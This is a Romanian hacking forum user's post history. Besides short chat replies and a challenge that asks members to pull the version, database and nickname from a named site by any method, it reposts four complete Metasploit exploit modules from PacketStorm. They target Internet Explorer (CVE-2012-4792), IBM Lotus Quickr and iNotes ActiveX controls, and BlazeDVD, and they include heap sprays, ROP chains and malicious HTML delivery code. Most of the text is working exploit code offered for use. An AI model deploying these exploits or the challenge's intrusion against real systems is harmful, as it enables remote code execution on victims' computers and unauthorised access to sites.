Praetorian503
-
Posts
578 -
Joined
-
Last visited
-
Days Won
5
Everything posted by Praetorian503
-
Ai PM. LinkImage
-
Target: ::Clothing Factory:: Cerinte: Version, database and nickname. Metoda: Oricare Postati screenshot. [table=width: 120, class: grid, align: left] [tr] [td]Solvers[/td] [/tr] [tr] [td]Roby4kill[/td] [/tr] [tr] [td]florin_darck[/td] [/tr] [tr] [td]afumat[/td] [/tr] [tr] [td]shaggi[/td] [/tr] [tr] [td]StoNe-[/td] [/tr] [tr] [td]1000DotS[/td] [/tr] [tr] [td]boogy[/td] [/tr] [tr] [td]pedala1[/td] [/tr] [tr] [td]XoddX[/td] [/tr] [tr] [td]-[/td] [/tr] [/table]
-
Probabil deaia.
-
Ai PM.
-
Noi suntem baieti rai, deci il ai.
-
Ai PM.
-
Deci ai venit sa ne spionezi ON: Bine ai venit.
-
1: 2: 3: 4:
-
Unii vor trage concluzia ca ce faci tu e bine, insa folosesti un limbaj analfabet, caracteristic varstei si unui cocalar cu acte in regula. Cu toate acestea, bun venit.
-
Bine sa ai venit hacking aici sa.
-
Ala cu 4S-ul poate e ala care si-a dat singur deface la rstcenter.com.ro
-
Un an nou fericit tuturor! 'Succesuri'
-
This Metasploit module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CButton object is freed, but a reference is kept and used again during a page reload, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild targeting mainly China/Taiwan/and US-based computers. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb def initialize(info={}) super(update_info(info, 'Name' => "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability", 'Description' => %q{ This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CButton object is freed, but a reference is kept and used again during a page reload, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild targeting mainly China/Taiwan/and US-based computers. }, 'License' => MSF_LICENSE, 'Author' => [ 'eromang', 'mahmud ab rahman', 'juan vazquez', 'sinn3r' #Metasploit ], 'References' => [ [ 'CVE', '2012-4792' ], [ 'US-CERT-VU', '154201' ], [ 'BID', '57070' ], [ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'], [ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'], [ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ], [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ], [ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ] ], 'Payload' => { 'Space' => 980, 'DisableNops' => true, 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30 [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x586' } ], # 0x0c0c0b30 [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30 [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x586' } ] # 0x0c0c0b30 ], 'Privileged' => false, 'DisclosureDate' => "Dec 27 2012", 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class) end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' ie = agent.scan(/MSIE (\d)/).flatten[0] || '' ie_name = "IE #{ie}" case nt when '5.1' os_name = 'Windows XP SP3' when '5.2' os_name = 'Windows Server 2003' when '6.0' os_name = 'Windows Vista' when '6.1' os_name = 'Windows 7' else # OS not supported return nil end targets.each do |t| if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) print_status("Target selected as: #{t.name}") return t end end return nil end def ie_heap_spray(my_target, p) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) js_nops = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4), Rex::Arch.endian(target.arch)) # Land the payload at 0x0c0c0b30 js = %Q| var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=1; i < 0x300; i++) { heap_obj.alloc(block); } | js = heaplib(js, {:noobfu => true}) if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end return js end def get_payload(t, cli) code = payload.encoded # No rop. Just return the payload. return code if t['Rop'].nil? =begin Stack Pivoting to eax: 0:008> db eax 0c0c0b30 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ 0c0c0b40 0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c ................ =end # Both ROP chains generated by mona.py - See corelan.be case t['Rop'] when :msvcrt print_status("Using msvcrt ROP") if t.name =~ /Windows XP/ stack_pivot = [0x77c15ed6].pack("V") * 54 # ret stack_pivot << [0x77c2362c].pack("V") # pop ebx, #ret stack_pivot << [0x77c15ed5].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'}) else stack_pivot = [0x77bcba5f].pack("V") * 54 # ret stack_pivot << [0x77bb4158].pack("V") # pop ebx, #ret stack_pivot << [0x77bcba5e].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'2003'}) end else print_status("Using JRE ROP") stack_pivot = [0x7c348b06].pack("V") * 54 # ret stack_pivot << [0x7c341748].pack("V") # pop ebx, #ret stack_pivot << [0x7c348b05].pack("V") # xchg eax,esp # ret # 0x0c0c0c0c rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot}) end return rop_payload end def load_exploit_html(my_target, cli) p = get_payload(my_target, cli) js = ie_heap_spray(my_target, p) html = %Q| <!doctype html> <html> <head> <script> #{js} function exploit() { var e0 = null; var e1 = null; var e2 = null; var arrObject = new Array(3000); var elmObject = new Array(500); for (var i = 0; i < arrObject.length; i++) { arrObject[i] = document.createElement('div'); arrObject[i].className = unescape("ababababababababababababababababababababa"); } for (var i = 0; i < arrObject.length; i += 2) { arrObject[i].className = null; } CollectGarbage(); for (var i = 0; i < elmObject.length; i ++) { elmObject[i] = document.createElement('button'); } for (var i = 1; i < arrObject.length; i += 2) { arrObject[i].className = null; } CollectGarbage(); try { e0 = document.getElementById("a"); e1 = document.getElementById("b"); e2 = document.createElement("q"); e1.applyElement(e2); e1.appendChild(document.createElement('button')); e1.applyElement(e0); e2.outerText = ""; e2.appendChild(document.createElement('body')); } catch(e) { } CollectGarbage(); for(var i =0; i < 20; i++) { arrObject[i].className = unescape("ababababababababababababababababababababa"); } var eip = window; var data = "#{Rex::Text.rand_text_alpha(41)}"; eip.location = unescape("%u0b30%u0c0c" + data); } </script> </head> <body onload="eval(exploit())"> <form id="a"> </form> <dfn id="b"> </dfn> </body> </html> | return html end def on_request_uri(cli, request) agent = request.headers['User-Agent'] uri = request.uri print_status("Requesting: #{uri}") my_target = get_target(agent) # Avoid the attack if no suitable target found if my_target.nil? print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end html = load_exploit_html(my_target, cli) html = html.gsub(/^\t\t/, '') print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end end =begin (87c.f40): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400 eip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 mshtml!CMarkup::OnLoadStatusDone+0x504: 637848c3 ff90dc000000 call dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=???????? 0:008> k ChildEBP RetAddr 020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504 020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47 020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f 020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12 020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb 020bfd78 7e418734 mshtml!GlobalWndProc+0x183 020bfda4 7e418816 USER32!InternalCallWinProc+0x28 020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150 020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306 020bfe7c 01252ec9 USER32!DispatchMessageW+0xf 020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461 020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1 020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab 020bffec 00000000 kernel32!BaseThreadStart+0x37 0:008> r eax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120 eip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 mshtml!CMarkup::OnLoadStatusDone+0x504: 637848c3 ff90dc000000 call dword ptr [eax+0DCh] ds:0023:0c0c0ce8=???????? =end Source: PacketStorm
-
This Metasploit module exploits a buffer overflow vulnerability on the UploadControl ActiveX. The vulnerability exists in the handling of the "Attachment_Times" property, due to the insecure usage of the _swscanf. The affected ActiveX is provided by the qp2.dll installed with the IBM Lotus Quickr product. This Metasploit module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7, using the qp2.dll 8.1.0.1800. In order to bypass ASLR the no aslr compatible module msvcr71.dll is used. This one is installed with the qp2 ActiveX. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "6.0", :ua_maxver => "9.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, :rank => Rank, :classid => "{05D96F71-87C6-11D3-9BE4-00902742D6E0}", :method => "Attachment_Times" }) def initialize(info={}) super(update_info(info, 'Name' => "IBM Lotus QuickR qp2 ActiveX Buffer Overflow", 'Description' => %q{ This module exploits a buffer overflow vulnerability on the UploadControl ActiveX. The vulnerability exists in the handling of the "Attachment_Times" property, due to the insecure usage of the _swscanf. The affected ActiveX is provided by the qp2.dll installed with the IBM Lotus Quickr product. This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7, using the qp2.dll 8.1.0.1800. In order to bypass ASLR the no aslr compatible module msvcr71.dll is used. This one is installed with the qp2 ActiveX. }, 'License' => MSF_LICENSE, 'Author' => [ 'Gaurav Baruah', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2012-2176' ], [ 'OSVDB', '82166' ], [ 'BID', '53678'], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-134/' ], [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21596191' ] ], 'Payload' => { 'Space' => 978, 'DisableNops' => true, 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ # qp2.dll 8.1.0.1800 [ 'Automatic', {} ], [ 'IE 6 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4', 'Ret' => 0x0c0c0c0c } ], [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4', 'Ret' => 0x0c0c0c0c } ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Ret' => 0x7C346B52 } ], # pop esp # ret # msvcr71.dll [ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4', 'Ret' => 0x0c0c0c0c } ], [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Ret' => 0x7C346B52 } ], # pop esp # ret # msvcr71.dll [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Ret' => 0x7C346B52 } ], # pop esp # ret # msvcr71.dll [ 'IE 9 on Windows 7', { 'Rop' => :jre, 'Offset' => '0x5fe', 'Ret' => 0x7C346B52 } ] # pop esp # ret # msvcr71.dll ], 'Privileged' => false, 'DisclosureDate' => "May 23 2012", 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class) end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' ie = agent.scan(/MSIE (\d)/).flatten[0] || '' ie_name = "IE #{ie}" case nt when '5.1' os_name = 'Windows XP SP3' when '6.0' os_name = 'Windows Vista' when '6.1' os_name = 'Windows 7' end targets.each do |t| if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) print_status("Target selected as: #{t.name}") return t end end return nil end def ie_heap_spray(my_target, p) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch)) # Land the payload at 0x0c0c0c0c case my_target when targets[7] # IE 9 on Windows 7 js = %Q| function randomblock(blocksize) { var theblock = ""; for (var i = 0; i < blocksize; i++) { theblock += Math.floor(Math.random()*90)+10; } return theblock; } function tounescape(block) { var blocklen = block.length; var unescapestr = ""; for (var i = 0; i < blocklen-1; i=i+4) { unescapestr += "%u" + block.substring(i,i+4); } return unescapestr; } var heap_obj = new heapLib.ie(0x10000); var code = unescape("#{js_code}"); var nops = unescape("#{js_random_nops}"); while (nops.length < 0x80000) nops += nops; var offset_length = #{my_target['Offset']}; for (var i=0; i < 0x1000; i++) { var padding = unescape(tounescape(randomblock(0x1000))); while (padding.length < 0x1000) padding+= padding; var junk_offset = padding.substring(0, offset_length); var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length); while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock; sprayblock = single_sprayblock.substring(0, (0x40000-6)/2); heap_obj.alloc(sprayblock); } | else # For IE 6, 7, 8 js = %Q| var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=1; i < 0x300; i++) { heap_obj.alloc(block); } var overflow = nops.substring(0, 10); | end js = heaplib(js, {:noobfu => true}) if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end return js end def get_payload(t, cli) code = payload.encoded # No rop. Just return the payload. return code if t['Rop'].nil? # Both ROP chains generated by mona.py - See corelan.be case t['Rop'] when :jre print_status("Using JRE ROP") rop_payload = generate_rop_payload('java', code)#, {'pivot'=>stack_pivot}) end return rop_payload end def load_exploit_html(my_target, cli) p = get_payload(my_target, cli) js = ie_heap_spray(my_target, p) bof = rand_text_alpha(512) # offset to eip" bof << [my_target.ret].pack("V") if my_target['Rop'] bof << rand_text_alpha(4) bof << [0x0c0c0c0c].pack("V") # new stack end my_bof = Rex::Text.to_unescape(bof) html = %Q| <html> <head> <script> #{js} </script> </head> <body> <object id="UploadControl" width="100%" height="100%" classid="clsid:05D96F71-87C6-11D3-9BE4-00902742D6E0"> <param name="General_Mode" value="1"> <param name="General_URL" value="http://#{rand_text_alpha(rand(10) + 5)}"> </object> <script> var bof = unescape("#{my_bof}"); var my_time = "#{rand_text_numeric(2)}/#{rand_text_numeric(2)}/#{rand_text_numeric(4)} #{rand_text_numeric(2)}:#{rand_text_numeric(2)}:#{rand_text_numeric(2)} "; my_time += bof; my_time += " GMT"; UploadControl.Attachment_Times = my_time; </script> </body> </html> | return html end def on_request_uri(cli, request) agent = request.headers['User-Agent'] uri = request.uri print_status("Requesting: #{uri}") my_target = get_target(agent) # Avoid the attack if no suitable target found if my_target.nil? print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end html = load_exploit_html(my_target, cli) html = html.gsub(/^\t\t/, '') print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end end Source: PacketStorm
-
This Metasploit module exploits a buffer overflow vulnerability on the UploadControl ActiveX. The vulnerability exists in the handling of the "Attachment_Times" property, due to the insecure usage of the _swscanf. The affected ActiveX is provided by the dwa85W.dll installed with the IBM Lotus iNotes ActiveX installer. This Metasploit module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7, using the dwa85W.dll 85.3.3.0 as installed with Lotus Domino 8.5.3. In order to bypass ASLR the no aslr compatible module dwabho.dll is used. This one is installed with the iNotes ActiveX. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :ua_name => HttpClients::IE, :ua_minver => "6.0", :ua_maxver => "9.0", :javascript => true, :os_name => OperatingSystems::WINDOWS, :rank => Rank, :classid => "{0F2AAAE3-7E9E-4b64-AB5D-1CA24C6ACB9C}", :method => "Attachment_Times" }) def initialize(info={}) super(update_info(info, 'Name' => "IBM Lotus iNotes dwa85W ActiveX Buffer Overflow", 'Description' => %q{ This module exploits a buffer overflow vulnerability on the UploadControl ActiveX. The vulnerability exists in the handling of the "Attachment_Times" property, due to the insecure usage of the _swscanf. The affected ActiveX is provided by the dwa85W.dll installed with the IBM Lotus iNotes ActiveX installer. This module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7, using the dwa85W.dll 85.3.3.0 as installed with Lotus Domino 8.5.3. In order to bypass ASLR the no aslr compatible module dwabho.dll is used. This one is installed with the iNotes ActiveX. }, 'License' => MSF_LICENSE, 'Author' => [ 'Gaurav Baruah', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2012-2175'], [ 'OSVDB', '82755' ], [ 'BID', '53879' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-132/' ], [ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21596862' ] ], 'Payload' => { 'Space' => 978, 'DisableNops' => true, 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ # dwa85W.dll 85.3.3.0 [ 'Automatic', {} ], [ 'IE 6 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4', 'Ret' => 0x0c0c0c0c } ], [ 'IE 7 on Windows XP SP3', { 'Rop' => nil, 'Offset' => '0x5F4', 'Ret' => 0x0c0c0c0c } ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4', 'Ret' => 0x77C34FBF } ], # pop esp # ret # msvcrt.dll [ 'IE 7 on Windows Vista', { 'Rop' => nil, 'Offset' => '0x5f4', 'Ret' => 0x0c0c0c0c } ], [ 'IE 8 on Windows Vista', { 'Rop' => :notes, 'Offset' => '0x5f4', 'Ret' => 0x1000f765 } ], # pop eax # ret # dwabho.dll [ 'IE 8 on Windows 7', { 'Rop' => :notes, 'Offset' => '0x5f4', 'Ret' => 0x1000f765 } ], # pop eax # ret # dwabho.dll [ 'IE 9 on Windows 7', { 'Rop' => :notes, 'Offset' => '0x5fe', 'Ret' => 0x1000f765 } ] # pop eax # ret # dwabho.dll ], 'Privileged' => false, 'DisclosureDate' => "Jun 01 2012", 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class) end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' ie = agent.scan(/MSIE (\d)/).flatten[0] || '' ie_name = "IE #{ie}" case nt when '5.1' os_name = 'Windows XP SP3' when '6.0' os_name = 'Windows Vista' when '6.1' os_name = 'Windows 7' end targets.each do |t| if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) print_status("Target selected as: #{t.name}") return t end end return nil end def ie_heap_spray(my_target, p) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch)) # Land the payload at 0x0c0c0c0c case my_target when targets[7] # IE 9 on Windows 7 js = %Q| function randomblock(blocksize) { var theblock = ""; for (var i = 0; i < blocksize; i++) { theblock += Math.floor(Math.random()*90)+10; } return theblock; } function tounescape(block) { var blocklen = block.length; var unescapestr = ""; for (var i = 0; i < blocklen-1; i=i+4) { unescapestr += "%u" + block.substring(i,i+4); } return unescapestr; } var heap_obj = new heapLib.ie(0x10000); var code = unescape("#{js_code}"); var nops = unescape("#{js_random_nops}"); while (nops.length < 0x80000) nops += nops; var offset_length = #{my_target['Offset']}; for (var i=0; i < 0x1000; i++) { var padding = unescape(tounescape(randomblock(0x1000))); while (padding.length < 0x1000) padding+= padding; var junk_offset = padding.substring(0, offset_length); var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length); while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock; sprayblock = single_sprayblock.substring(0, (0x40000-6)/2); heap_obj.alloc(sprayblock); } | else # For IE 6, 7, 8 js = %Q| var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=1; i < 0x300; i++) { heap_obj.alloc(block); } var overflow = nops.substring(0, 10); | end js = heaplib(js, {:noobfu => true}) if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end return js end def get_payload(t, cli) code = payload.encoded # No rop. Just return the payload. return code if t['Rop'].nil? # Both ROP chains generated by mona.py - See corelan.be case t['Rop'] when :msvcrt print_status("Using msvcrt ROP") rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})#{'pivot'=>stack_pivot, 'target'=>'xp'}) else print_status("Using dwabho.dll ROP") # gadgets from dwabho.dll, using mona.py rop_payload = [ 0x1000f765, # POP EAX # RETN 0x1001a22c, # ptr to &VirtualAlloc() [IAT dwabho.dll] 0x10010394, # JMP DWORD PTR DS:[EAX] 0x0c0c0c2c, # ret after VirtualAlloc 0x0c0c0c2c, # lpAddress 0x00000400, # dwSize 0x00001000, # flAllocationType 0x00000040 # flProtect ].pack("V*") rop_payload << code end return rop_payload end def load_exploit_html(my_target, cli) p = get_payload(my_target, cli) js = ie_heap_spray(my_target, p) bof = rand_text_alpha(552) # offset to eip bof << [my_target.ret].pack("V") case my_target['Rop'] when :msvcrt bof << rand_text_alpha(4) bof << [0x0c0c0c0c].pack("V") # new ESP when :notes bof << rand_text_alpha(4) bof << [0x0c0c0c00].pack("V") # eax bof << [0x1000f49a].pack("V") # pop esp # dec ecx # add byte ptr ds:[eax],al # pop ecx # pop ecx # retn # dwabho.dll bof << [0x0c0c0c04].pack("V") # new ESP end my_bof = Rex::Text.to_unescape(bof) html = %Q| <html> <head> <script> #{js} </script> </head> <body> <object id="UploadControl" width="100%" height="100%" classid="clsid:0F2AAAE3-7E9E-4b64-AB5D-1CA24C6ACB9C"> <param name="General_Mode" value="1"> <param name="General_URL" value="http://#{rand_text_alpha(rand(10) + 5)}"> </object> <script> var bof = unescape("#{my_bof}"); var my_time = "#{rand_text_numeric(2)}/#{rand_text_numeric(2)}/#{rand_text_numeric(4)} #{rand_text_numeric(2)}:#{rand_text_numeric(2)}:#{rand_text_numeric(2)} "; my_time += bof; my_time += " GMT"; UploadControl.Attachment_Times = my_time; </script> </body> </html> | return html end def on_request_uri(cli, request) agent = request.headers['User-Agent'] uri = request.uri print_status("Requesting: #{uri}") my_target = get_target(agent) # Avoid the attack if no suitable target found if my_target.nil? print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end html = load_exploit_html(my_target, cli) html = html.gsub(/^\t\t/, '') print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end end Source: PacketStorm
-
This Metasploit module updates an existing MSF module originally written for BlazeDVD 5.1. The new module will bypass DEP and ASLR on version 6. The original vulnerability is due to the handling of specially crafted PLF files. Exploiting this allows us to execute arbitrary code running under the context of the user. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'BlazeDVD 6.1 PLF Exploit DEP/ASLR Bypass', 'Description' => %q{ This module updates an existing MSF module originally written for BlazeDVD 5.1. The new module will bypass DEP and ASLR on version 6. The original vulnerability is due to the handling of specially crafted PLF files. Exploiting this allows us to execute arbitrary code running under the context of the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Gjoko Krstic', # Original discovery 'Craig Freyman @cd1zz', # MSF Module ], 'References' => [ [ 'OSVDB', '30770' ], [ 'CVE', '2006-6199' ], [ 'URL', 'http://www.exploit-db.com/exploits/6217/' ], [ 'URL', 'http://www.exploit-db.com/exploits/13905/' ], [ 'URL', 'http://www.exploit-db.com/exploits/9329/' ], [ 'URL', 'http://www.exploit-db.com/exploits/16618/' ] ], 'DefaultOptions' => { 'ExitFunction' => 'process', #'InitialAutoRunScript' => 'migrate -f', }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x00\x0a\x1a\x2f\x3a\x5c", 'DisableNops' => true, 'StackAdjustment' => -3500 }, 'Targets' => [ [ 'win', { 'Ret' => 0x6030ef6c,# : {pivot 2352 / 0x930} : # POP ESI # ADD ESP,92C # RETN 'Offset' => 872 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Aug 10 2008', 'DefaultTarget' => 0)) register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']),], self.class) end def create_rop_chain() # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ 0x640258bf, # POP EAX # RETN [MediaPlayerCtrl.dll] 0x10011108, # ptr to &VirtualProtect() [IAT SkinScrollBar.Dll] 0x6033d8be, # MOV ESI,DWORD PTR DS:[EAX] # RETN [Configuration.dll] 0x60327f7f, # POP EBP # RETN [Configuration.dll] 0x616069a1, # & push esp # ret 04 [EPG.dll] 0x60335f98, # POP EAX # RETN [Configuration.dll] 0xfffffdff, # Value to negate, will become 0x00000201 0x6404c4c3, # NEG EAX # RETN [MediaPlayerCtrl.dll] 0x64016676, # XCHG EAX,EBX # RETN [MediaPlayerCtrl.dll] 0x6410948f, # POP EAX # RETN [NetReg.dll] 0xffffffc0, # Value to negate, will become 0x00000040 0x6033b0eb, # NEG EAX # RETN [Configuration.dll] 0x61608ba2, # XCHG EAX,EDX # RETN [EPG.dll] 0x6033d975, # POP ECX # RETN [Configuration.dll] 0x6411c001, # &Writable location [NetReg.dll] 0x6410a85d, # POP EDI # RETN [NetReg.dll] 0x6160b805, # RETN (ROP NOP) [EPG.dll] 0x6402c108, # POP EAX # RETN [MediaPlayerCtrl.dll] 0x90909090, # nop 0x6033d886, # PUSHAD # RETN [Configuration.dll] ].flatten.pack("V*") return rop_gadgets end def exploit rop_chain = create_rop_chain() stack_adjust = "\x81\xc4\x24\xfa\xff\xff" buf = '' buf << make_nops(target['Offset']) buf << [target.ret].pack('V') buf << make_nops(8) #filler for stack pivot buf << rop_chain buf << stack_adjust buf << payload.encoded buf << make_nops(5000 - buf.length) file_create(buf) end end 